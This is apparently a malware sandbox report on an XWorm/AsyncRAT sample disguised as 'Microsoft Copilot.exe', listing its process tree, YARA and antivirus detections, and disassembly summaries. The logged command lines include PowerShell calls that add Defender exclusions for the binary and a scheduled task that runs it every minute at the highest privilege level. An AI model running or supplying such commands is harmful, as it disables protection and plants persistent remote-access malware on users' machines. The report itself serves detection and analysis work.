                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 84%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                                                                                    Imagebase:0x3d0000
                                                                                    File size:12'800 bytes
                                                                                    MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\SysWOW64\7za.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                                                                                    Imagebase:0xa0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:18:53:07
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:18:53:11
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:18:53:11
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:18:53:18
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:18:53:18
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:20:34:28
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:20:34:29
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:20:34:46
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:20:34:46
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:20:35:09
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x7ff6e7500000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:27
                                                                                    Start time:20:35:09
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:28
                                                                                    Start time:20:35:11
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0xf20000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: ditekSHen
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 84%, ReversingLabs
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:29
                                                                                    Start time:20:35:23
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x9c0000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:30
                                                                                    Start time:20:35:31
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x560000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:31
                                                                                    Start time:20:36:01
                                                                                    Start date:06/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                                                                                    Imagebase:0x660000
                                                                                    File size:71'680 bytes
                                                                                    MD5 hash:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:78.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:9.1%
                                                                                      Total number of Nodes:22
                                                                                      Total number of Limit Nodes:1

                                                                                      Callgraph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      • Opacity -> Relevance
                                                                                      • Disassembly available
                                                                                      callgraph 0 Function_00401000 1 Function_004013B4 2 Function_00401475 5 Function_004013FF 2->5 3 Function_00401358 4 Function_0040108C 4->0 5->1 5->3 5->4

                                                                                      Executed Functions

                                                                                      Function 00401475 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3649950142-0
                                                                                      • Opcode ID: d13ffaed50b34c3bc6c1db2eee5796bdcff0477068228ef5aa395199288844a4
                                                                                      • Instruction ID: 66cff4c9c878bf8aa2b1410eb4bc4b7608e7e5898a8f40ad2895ff3de646009b
                                                                                      • Opcode Fuzzy Hash: d13ffaed50b34c3bc6c1db2eee5796bdcff0477068228ef5aa395199288844a4
                                                                                      • Instruction Fuzzy Hash: 77111EF6E01204BBCB10EBE8EC81F5B77BCAB59344F10447AB805E73A1E538EA458765
                                                                                      Function 0040108C Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 207filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                      • String ID: 8BC$8BC$%s\%s$& @$2 @$2-J]$88A$E8A
                                                                                      • API String ID: 1891165703-1496258695
                                                                                      • Opcode ID: 882598a55b71346998ba52c65563725e66f32605d8b776d4f626809784564fe0
                                                                                      • Instruction ID: deb19d4d0723d3d67ee9a72fdb9f6f6ed23126a5912012a87401ff7aba8da44e
                                                                                      • Opcode Fuzzy Hash: 882598a55b71346998ba52c65563725e66f32605d8b776d4f626809784564fe0
                                                                                      • Instruction Fuzzy Hash: 9B71E4F1E001049BDB54DB9CDC81BDD77B9EB44309F04417AF60AFB391E639AA848B59
                                                                                      Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 22 401000-40102e malloc 23 401031-401039 22->23 24 401087-40108b 23->24 25 40103f-401085 23->25 25->23
                                                                                      APIs
                                                                                      Strings
                                                                                      • ]]/335@^_a]^)_gkee_7ix=6*z(feu<>, xrefs: 0040106E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID: ]]/335@^_a]^)_gkee_7ix=6*z(feu<>
                                                                                      • API String ID: 2803490479-1468156545
                                                                                      • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                      • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                      • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                      • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45
                                                                                      Function 004013FF Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 28 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$fopenstrcmpstrcpy
                                                                                      • String ID: D`{vD`{v$D`{vD`{v
                                                                                      • API String ID: 1173922025-2698036915
                                                                                      • Opcode ID: 4f9e64c81c8a16543b34c99aeb52530aa6aad91c054d3e45980c1e6a43f1a0b4
                                                                                      • Instruction ID: aca092302289a549aeab8a8447becf2e0ff84cd71f36c661b78afd72486b09b0
                                                                                      • Opcode Fuzzy Hash: 4f9e64c81c8a16543b34c99aeb52530aa6aad91c054d3e45980c1e6a43f1a0b4
                                                                                      • Instruction Fuzzy Hash: EBF0ACB5A01248EFCB40EFEDE981E8E77F8BB59304F104465F948D7351E634EA458B54

                                                                                      Execution Graph

                                                                                      Execution Coverage:20.9%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:25%
                                                                                      Total number of Nodes:12
                                                                                      Total number of Limit Nodes:0

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB316E9 Relevance: 1.9, Strings: 1, Instructions: 698COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CAN_^
                                                                                      • API String ID: 0-3098826533
                                                                                      • Opcode ID: 827c51d9c4a15ccb5610eaa5ddabecf53536322225b896feda6fe20e28d6bd44
                                                                                      • Instruction ID: 2069e9314d364be70344fa10793b5a04688d6cada5cc5975c54b33c72c98731f
                                                                                      • Opcode Fuzzy Hash: 827c51d9c4a15ccb5610eaa5ddabecf53536322225b896feda6fe20e28d6bd44
                                                                                      • Instruction Fuzzy Hash: 5B22B7B0B19A598FE794EB3CC459A79B7D2FF99300F404579E40EC37E2DE29A8058781
                                                                                      Function 00007FFAACB3764A Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 219 7ffaacb3764a-7ffaacb37b0d CheckRemoteDebuggerPresent 223 7ffaacb37b0f 219->223 224 7ffaacb37b15-7ffaacb37b58 219->224 223->224
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: e384a2efea225c93ee5e45418a5965912c0f1f4f1b0a58da765842941db2b275
                                                                                      • Instruction ID: b8cb536f28a284fee7d9f4318fa7d1a500f41433a2966d4d323788f3c15d6104
                                                                                      • Opcode Fuzzy Hash: e384a2efea225c93ee5e45418a5965912c0f1f4f1b0a58da765842941db2b275
                                                                                      • Instruction Fuzzy Hash: 7831E67190861C8FDB58DF5CC8497F9BBE0EF65311F14412AD48AD7251DB70A846CBD1
                                                                                      Function 00007FFAACB36096 Relevance: .5, Instructions: 471COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 447 7ffaacb36096-7ffaacb360a3 448 7ffaacb360ae-7ffaacb36177 447->448 449 7ffaacb360a5-7ffaacb360ad 447->449 452 7ffaacb361e3 448->452 453 7ffaacb36179-7ffaacb36182 448->453 449->448 454 7ffaacb361e5-7ffaacb3620a 452->454 453->452 455 7ffaacb36184-7ffaacb36190 453->455 461 7ffaacb3620c-7ffaacb36215 454->461 462 7ffaacb36276 454->462 456 7ffaacb36192-7ffaacb361a4 455->456 457 7ffaacb361c9-7ffaacb361e1 455->457 459 7ffaacb361a8-7ffaacb361bb 456->459 460 7ffaacb361a6 456->460 457->454 459->459 463 7ffaacb361bd-7ffaacb361c5 459->463 460->459 461->462 464 7ffaacb36217-7ffaacb36223 461->464 465 7ffaacb36278-7ffaacb36320 462->465 463->457 466 7ffaacb3625c-7ffaacb36274 464->466 467 7ffaacb36225-7ffaacb36237 464->467 476 7ffaacb3638e 465->476 477 7ffaacb36322-7ffaacb3632c 465->477 466->465 468 7ffaacb3623b-7ffaacb3624e 467->468 469 7ffaacb36239 467->469 468->468 471 7ffaacb36250-7ffaacb36258 468->471 469->468 471->466 479 7ffaacb36390-7ffaacb363b9 476->479 477->476 478 7ffaacb3632e-7ffaacb3633b 477->478 480 7ffaacb3633d-7ffaacb3634f 478->480 481 7ffaacb36374-7ffaacb3638c 478->481 486 7ffaacb363bb-7ffaacb363c6 479->486 487 7ffaacb36423 479->487 482 7ffaacb36351 480->482 483 7ffaacb36353-7ffaacb36366 480->483 481->479 482->483 483->483 485 7ffaacb36368-7ffaacb36370 483->485 485->481 486->487 488 7ffaacb363c8-7ffaacb363d6 486->488 489 7ffaacb36425-7ffaacb364b6 487->489 490 7ffaacb3640f-7ffaacb36421 488->490 491 7ffaacb363d8-7ffaacb363ea 488->491 497 7ffaacb364bc-7ffaacb364cb 489->497 490->489 492 7ffaacb363ec 491->492 493 7ffaacb363ee-7ffaacb36401 491->493 492->493 493->493 495 7ffaacb36403-7ffaacb3640b 493->495 495->490 498 7ffaacb364cd 497->498 499 7ffaacb364d3-7ffaacb36538 call 7ffaacb36554 497->499 498->499 506 7ffaacb3653a 499->506 507 7ffaacb3653f-7ffaacb36553 499->507 506->507
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c437160bd610dfb6ee9438410077199b864a6f5711602d7d1e7e8eb7e743f2f
                                                                                      • Instruction ID: 18497f36d9e1e3f2f5bd8836604a10c7497f4e01e428c52f327f5557e247fbc2
                                                                                      • Opcode Fuzzy Hash: 5c437160bd610dfb6ee9438410077199b864a6f5711602d7d1e7e8eb7e743f2f
                                                                                      • Instruction Fuzzy Hash: 19F1C470908A8D8FEBA8DF28C8557E937E1FF55300F04826EE84DC7691DB74E9458B81
                                                                                      Function 00007FFAACB36E42 Relevance: .5, Instructions: 457COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e4417bacae9e1537afc086f863ca941c928848588e3727dfe769770f9d9864c
                                                                                      • Instruction ID: 65253915ec3db6bf9e15faada3c2d8028d27e566224190cfbf138b8916c3e24a
                                                                                      • Opcode Fuzzy Hash: 2e4417bacae9e1537afc086f863ca941c928848588e3727dfe769770f9d9864c
                                                                                      • Instruction Fuzzy Hash: D5E1C230908A4E8FEBA8DF28C8557E977E1FF55310F04826AE84DC7691DF78E8448B81
                                                                                      Function 00007FFAACB32361 Relevance: .4, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d451a7aacca96626b5c979c5a1768eab9d78a15663013e20e22c180be25d3586
                                                                                      • Instruction ID: 3dfa89f2178c69a7463f6aa1208727b00fba56e947f5470bc1e0be31f21b9f6c
                                                                                      • Opcode Fuzzy Hash: d451a7aacca96626b5c979c5a1768eab9d78a15663013e20e22c180be25d3586
                                                                                      • Instruction Fuzzy Hash: 1AB193B0B1DA598FFB98EB38C46567976D2EF99300F048179D45EC3793DE29E8058382
                                                                                      Function 00007FFAACB320C1 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60ddd7f57ac531c5b3bab2de60aee10e0d0bcb2d24f3dd1062d7b7ca5e41f79a
                                                                                      • Instruction ID: 9e687112019e6de74b1393ba644417875ede66e86b5806a591dbbd5a2224d8c9
                                                                                      • Opcode Fuzzy Hash: 60ddd7f57ac531c5b3bab2de60aee10e0d0bcb2d24f3dd1062d7b7ca5e41f79a
                                                                                      • Instruction Fuzzy Hash: E5515351A5E6C54FE786A778D8646757FE9DF87219B0804FBE0CDC3293DD08884AC382
                                                                                      Function 00007FFAACB3982D Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 188 7ffaacb3982d-7ffaacb39930 RtlSetProcessIsCritical 196 7ffaacb39932 188->196 197 7ffaacb39938-7ffaacb3996d 188->197 196->197
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
